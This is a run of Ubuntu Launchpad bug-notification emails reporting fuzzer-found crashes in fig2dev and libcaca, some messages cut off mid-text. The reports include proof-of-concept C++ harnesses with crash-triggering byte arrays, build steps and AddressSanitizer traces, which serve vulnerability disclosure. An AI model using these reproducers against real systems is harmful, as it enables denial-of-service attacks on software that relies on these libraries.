[Touch-packages] [Bug 1926673] [NEW] Null pointer of fig2dev of gensvg.c in function svg_arrows
*** This bug is a security vulnerability *** Public security bug reported: Hi I found an crash error. issues: https://sourceforge.net/p/mcj/tickets/114/ commit:https://sourceforge.net/p/mcj/fig2dev/ci/43cfa693284b076e5d2cc100758a34b76db65e58/ System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 fig2dev Version 3.2.8a Verification steps: 1.Get the source code of fig2dev 2.Compile the fig2dev ```bash $ cd fig2dev-3.2.8a $ ./configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address" $ make ``` 3.run fig2dev ```bash $ ./fig2dev -L svg fig2dev_crash ``` asan info: http://www.w3.org/2000/svg; xmlns:xlink="http://www.w3.org/1999/xlink; width="73pt" height="113pt" viewBox="-76 -376 1202 1877"> AddressSanitizer:DEADLYSIGNAL = ==3255219==ERROR: AddressSanitizer: SEGV on unknown address 0x (pc 0x00583a3d bp 0x7ffec0773610 sp 0x7ffec0773590 T0) ==3255219==The signal is caused by a READ memory access. ==3255219==Hint: address points to the zero page. #0 0x583a3d in svg_arrows /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24 #1 0x583a3d in gensvg_line /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:743:17 #2 0x4d0847 in gendev_objects /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:1008:6 #3 0x4d0847 in main /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:485:11 #4 0x7f5e0e4f50b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #5 0x41c71d in _start (/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev+0x41c71d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24 in svg_arrows ==3255219==ABORTING ** Affects: xfig (Ubuntu) Importance: Undecided Assignee: xiao huang (shanzhuli) Status: New ** Tags: security ** Information type changed from Private Security to Public Security ** Summary changed: - fig2dev + Null pointer of fig2dev of gensvg.c in function svg_arrows ** Description changed: Hi I found an crash error. issues: https://sourceforge.net/p/mcj/tickets/114/ - + commit:https://sourceforge.net/p/mcj/fig2dev/ci/43cfa693284b076e5d2cc100758a34b76db65e58/ System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 fig2dev Version 3.2.8a Verification steps: 1.Get the source code of fig2dev 2.Compile the fig2dev ```bash $ cd fig2dev-3.2.8a $ ./configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address" - $ make + $ make ``` 3.run fig2dev ```bash $ ./fig2dev -L svg fig2dev_crash ``` asan info: http://www.w3.org/2000/svg; - xmlns:xlink="http://www.w3.org/1999/xlink; - width="73pt" height="113pt" - viewBox="-76 -376 1202 1877"> + xmlns:xlink="http://www.w3.org/1999/xlink; + width="73pt" height="113pt" + viewBox="-76 -376 1202 1877"> + stroke="#00" stroke-width="8px"/> + stroke="#ff" stroke-width="8px"/> + stroke="#ff" stroke-width="8px"/> + x="0" y="0" width="134" height="134"> + stroke="#00" stroke-width="8px"/> + stroke="#00" stroke-width="8px"/> AddressSanitizer:DEADLYSIGNAL = ==3255219==ERROR: AddressSanitizer: SEGV on unknown address 0x (pc 0x00583a3d bp 0x7ffec0773610 sp 0x7ffec0773590 T0) ==3255219==The signal is caused by a READ memory access. ==3255219==Hint: address points to the zero page. - #0 0x583a3d in svg_arrows /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24 - #1 0x583a3d in gensvg_line /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:743:17 - #2 0x4d0847 in gendev_objects /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:1008:6 - #3 0x4d0847 in main /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:485:11 - #4 0x7f5e0e4f50b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 - #5 0x41c71d in _start (/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev+0x41c71d) + #0 0x583a3d in svg_arrows /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24 + #1 0x583a3d in gensvg_line /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:743:17 + #2 0x4d0847 in gendev_objects /home/hh/Downloads/fig2dev-3.
[Touch-packages] [Bug 1925467] Re: stack-buffer-overflow of text.c in function _import_ansi
** Description changed: Hello ubuntu security team + + issues: https://github.com/cacalabs/libcaca/issues/55 + System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Fedora 33: clang 11.0.0 , gcc 10.2.1 libcaca version e4968ba Verification steps: 1.Get the source code of libcaca 2.Compile the libcaca.so library $ cd libcaca $ ./bootstrap $ ./configure $ make or $ cd libcaca $ ./bootstrap $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" $ make 3.Create the poc_ansi.cc && build #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; void crash(const uint8_t *Data, size_t Size) { - if(Size<8) return ; - size_t len=0; - caca_canvas_t *cv; - cv = caca_create_canvas(0,0); - caca_create_frame(cv,0); - caca_set_frame(cv,0); - caca_import_canvas_from_memory(cv,Data,Size,"ansi"); - caca_free_canvas(cv); - cv=NULL; + if(Size<8) return ; + size_t len=0; + caca_canvas_t *cv; + cv = caca_create_canvas(0,0); + caca_create_frame(cv,0); + caca_set_frame(cv,0); + caca_import_canvas_from_memory(cv,Data,Size,"ansi"); + caca_free_canvas(cv); + cv=NULL; } - int main(int args,char* argv[]){ - size_t len = 0; - unsigned char buffer[] = {0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc}; - len = sizeof(buffer)/sizeof(unsigned char); - printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); - crash((const uint8_t*)buffer,len); + size_t len = 0; + unsigned char buffer[] = {0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc}; + len = sizeof(buffer)/sizeof(unsigned char); + printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); + crash((const uint8_t*)buffer,len); - return 0; + return 0; } 4.compile poc_ansi.cc clang++ -g poc_ansi.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_ansi 5.Run poc_ansi asan info: = ==3763372==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffda0164bea at pc 0x7f098d82c310 bp 0x7ffda01647b0 sp 0x7ffda01647a8 READ of size 1 at 0x7ffda0164bea thread T0 - #0 0x7f098d82c30f in _import_ansi /home/hh/Downloads/libcaca/caca/codec/text.c:391:38 - #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3 - #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9 - #3 0x7f098d2780b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 - #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d) + #0 0x7f098d82c30f in _import_ansi /home/hh/Downloads/libcaca/caca/codec/text.c:391:38 + #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3 + #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9 + #3 0x7f098d2780b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 + #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d) Address 0x7ffda0164bea is located in stack of thread T0 at offset 42 in frame - #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28 + #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28 - This frame has 1 object(s): - [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this variable + This frame has 1 object(s): + [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork - (longjmp and C++ exceptions *are* supported) + (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/text.c:391:38 in _import_ansi Shadow bytes around the buggy address: - 0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 - 0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2 - 0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00 - 0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 + 0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2 + 0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00 + 0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x100034024970:
[Touch-packages] [Bug 1925468] Re: stack-buffer-overflow of import.c in function _import_bin
** Description changed: Hello ubuntu security team + + issues:https://github.com/cacalabs/libcaca/issues/56 + System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Fedora 33: clang 11.0.0 , gcc 10.2.1 + libcaca version e4968ba Verification steps: 1.Get the source code of libcaca 2.Compile the libcaca.so library $ cd libcaca $ ./bootstrap $ ./configure $ make or $ cd libcaca $ ./bootstrap $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" $ make 3.Create the poc_bin.cc && build #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; void crash(const uint8_t *Data, size_t Size) { - if(Size<8) return ; - size_t len=0; - caca_canvas_t *cv; - cv = caca_create_canvas(0,0); - caca_create_frame(cv,0); - caca_set_frame(cv,0); - caca_import_canvas_from_memory(cv,Data,Size,"bin"); - caca_free_canvas(cv); - cv=NULL; + if(Size<8) return ; + size_t len=0; + caca_canvas_t *cv; + cv = caca_create_canvas(0,0); + caca_create_frame(cv,0); + caca_set_frame(cv,0); + caca_import_canvas_from_memory(cv,Data,Size,"bin"); + caca_free_canvas(cv); + cv=NULL; } int main(int args,char* argv[]){ - size_t len = 0; - unsigned char buffer[] = {0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47}; - len = sizeof(buffer)/sizeof(unsigned char); - printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); - crash((const uint8_t*)buffer,len); - return 0; + size_t len = 0; + unsigned char buffer[] = {0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47}; + len = sizeof(buffer)/sizeof(unsigned char); + printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); + crash((const uint8_t*)buffer,len); + return 0; } 4.compile poc_bin.cc clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin 5.Run poc_bin asan info: = ==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8 READ of size 1 at 0x7ffe7cd3774d thread T0 - #0 0x7f8c6314acfc in _import_bin /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 - #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3 - #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9 - #3 0x7f8c62ba00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 - #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d) + #0 0x7f8c6314acfc in _import_bin /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 + #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3 + #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9 + #3 0x7f8c62ba00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 + #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d) Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame - #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28 + #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28 - This frame has 1 object(s): - [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this variable + This frame has 1 object(s): + [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork - (longjmp and C++ exceptions *are* supported) + (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin Shadow bytes around the buggy address: - 0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[Touch-packages] [Bug 1925467] [NEW] stack-buffer-overflow of text.c in function _import_ansi
*** This bug is a security vulnerability *** Public security bug reported: Hello ubuntu security team System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Fedora 33: clang 11.0.0 , gcc 10.2.1 libcaca version e4968ba Verification steps: 1.Get the source code of libcaca 2.Compile the libcaca.so library $ cd libcaca $ ./bootstrap $ ./configure $ make or $ cd libcaca $ ./bootstrap $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" $ make 3.Create the poc_ansi.cc && build #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; void crash(const uint8_t *Data, size_t Size) { if(Size<8) return ; size_t len=0; caca_canvas_t *cv; cv = caca_create_canvas(0,0); caca_create_frame(cv,0); caca_set_frame(cv,0); caca_import_canvas_from_memory(cv,Data,Size,"ansi"); caca_free_canvas(cv); cv=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc}; len = sizeof(buffer)/sizeof(unsigned char); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); crash((const uint8_t*)buffer,len); return 0; } 4.compile poc_ansi.cc clang++ -g poc_ansi.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_ansi 5.Run poc_ansi asan info: = ==3763372==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffda0164bea at pc 0x7f098d82c310 bp 0x7ffda01647b0 sp 0x7ffda01647a8 READ of size 1 at 0x7ffda0164bea thread T0 #0 0x7f098d82c30f in _import_ansi /home/hh/Downloads/libcaca/caca/codec/text.c:391:38 #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3 #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9 #3 0x7f098d2780b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d) Address 0x7ffda0164bea is located in stack of thread T0 at offset 42 in frame #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28 This frame has 1 object(s): [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/text.c:391:38 in _import_ansi Shadow bytes around the buggy address: 0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2 0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00 0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x100034024970: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00[02]f3 f3 0x100034024980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034024990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000340249a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000340249b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000340249c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user:f7 Container overflow: fc Array cookie:ac Intra object redzone:bb ASan internal: fe Left alloca redzone: ca Right alloca redzone:cb Shadow gap: cc ==3763372==ABORTING Thanks ** Affects: libcaca (Ubuntu) Importance: Undecided Status: New ** Information type changed from Public to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1925467 Title: stack-buffer-overflow of text.c in function _import_ansi Status in libcaca package in Ubuntu: New Bug description: Hello ubuntu security team System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Fedora 33: clang 11.0.0 , gcc 10.2.1 libcaca version e4968ba Verification steps: 1.Get the source code of libcaca 2.Compile the libcaca.so library $ cd libcaca $
[Touch-packages] [Bug 1925468] [NEW] stack-buffer-overflow of import.c in function _import_bin
*** This bug is a security vulnerability *** Public security bug reported: Hello ubuntu security team System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Fedora 33: clang 11.0.0 , gcc 10.2.1 libcaca version e4968ba Verification steps: 1.Get the source code of libcaca 2.Compile the libcaca.so library $ cd libcaca $ ./bootstrap $ ./configure $ make or $ cd libcaca $ ./bootstrap $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" $ make 3.Create the poc_bin.cc && build #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; void crash(const uint8_t *Data, size_t Size) { if(Size<8) return ; size_t len=0; caca_canvas_t *cv; cv = caca_create_canvas(0,0); caca_create_frame(cv,0); caca_set_frame(cv,0); caca_import_canvas_from_memory(cv,Data,Size,"bin"); caca_free_canvas(cv); cv=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47}; len = sizeof(buffer)/sizeof(unsigned char); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); crash((const uint8_t*)buffer,len); return 0; } 4.compile poc_bin.cc clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin 5.Run poc_bin asan info: = ==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8 READ of size 1 at 0x7ffe7cd3774d thread T0 #0 0x7f8c6314acfc in _import_bin /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3 #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9 #3 0x7f8c62ba00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d) Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28 This frame has 1 object(s): [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin Shadow bytes around the buggy address: 0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00 0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user:f7 Container overflow: fc Array cookie:ac Intra object redzone:bb ASan internal: fe Left alloca redzone: ca Right alloca redzone:cb Shadow gap: cc ==3817476==ABORTING Thanks ** Affects: libcaca (Ubuntu) Importance: Undecided Status: New ** Information type changed from Public to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1925468 Title: stack-buffer-overflow of import.c in function _import_bin Status in libcaca package in Ubuntu: New Bug description: Hello ubuntu security team System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Fedora 33: clang 11.0.0 , gcc 10.2.1 libcaca version e4968ba Verification steps: 1.Get the source code of libcaca 2.Compile the libcaca.so library $ cd
[Touch-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
Issues have been assigned numbers CVE-2021-30498、CVE-2021-30499 ** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-30498 ** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-30499 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1923273 Title: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff Status in libcaca package in Ubuntu: New Bug description: Hello Ubuntu Security Team I use libfuzzer to test libcaca api .I found two crash - https://github.com/cacalabs/libcaca/issues/53 - https://github.com/cacalabs/libcaca/issues/54 ## Vendor of Product https://github.com/cacalabs/libcaca ## Affected Product Code Base libcaca e4968ba ## Affected Component affected component:libcaca.so ## Affected source code file affected source code file(As call stack): ->caca_export_canvas_to_memory() in libcaca/caca/codec/export.c ->caca_export_memory()in libcaca/caca/codec/export.c -> export_tga()in libcaca/caca/codec/export.c -> export_troff() in libcaca/caca/codec/export.c ## Attack Type Context-dependent ## Impact Denial of Service true ## Reference https://github.com/cacalabs/libcaca ## Discoverer fdgnneig ## Verification process and POC ### Verification steps: 1.Get the source code of libcaca: 2.Compile the libcaca.so library: ```shell $ cd libcaca $ apt-get install automake libtool pkg-config -y $ ./bootstrap $ ./configure $ make 3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc 4.Run POC POC.sh ``` cat << EOF > poc_troff.cc #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"troff",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff cat << EOF > poc_tga.cc #include "config.h" #include "caca.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"tga",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; return 0; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11}; len = sizeof(buffer)/sizeof(unsigned char);
[Touch-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
** Summary changed: - libcaca buffer-overflow + buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1923273 Title: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff Status in libcaca package in Ubuntu: New Bug description: Hello Ubuntu Security Team I use libfuzzer to test libcaca api .I found two crash - https://github.com/cacalabs/libcaca/issues/53 - https://github.com/cacalabs/libcaca/issues/54 ## Vendor of Product https://github.com/cacalabs/libcaca ## Affected Product Code Base libcaca e4968ba ## Affected Component affected component:libcaca.so ## Affected source code file affected source code file(As call stack): ->caca_export_canvas_to_memory() in libcaca/caca/codec/export.c ->caca_export_memory()in libcaca/caca/codec/export.c -> export_tga()in libcaca/caca/codec/export.c -> export_troff() in libcaca/caca/codec/export.c ## Attack Type Context-dependent ## Impact Denial of Service true ## Reference https://github.com/cacalabs/libcaca ## Discoverer fdgnneig ## Verification process and POC ### Verification steps: 1.Get the source code of libcaca: 2.Compile the libcaca.so library: ```shell $ cd libcaca $ apt-get install automake libtool pkg-config -y $ ./bootstrap 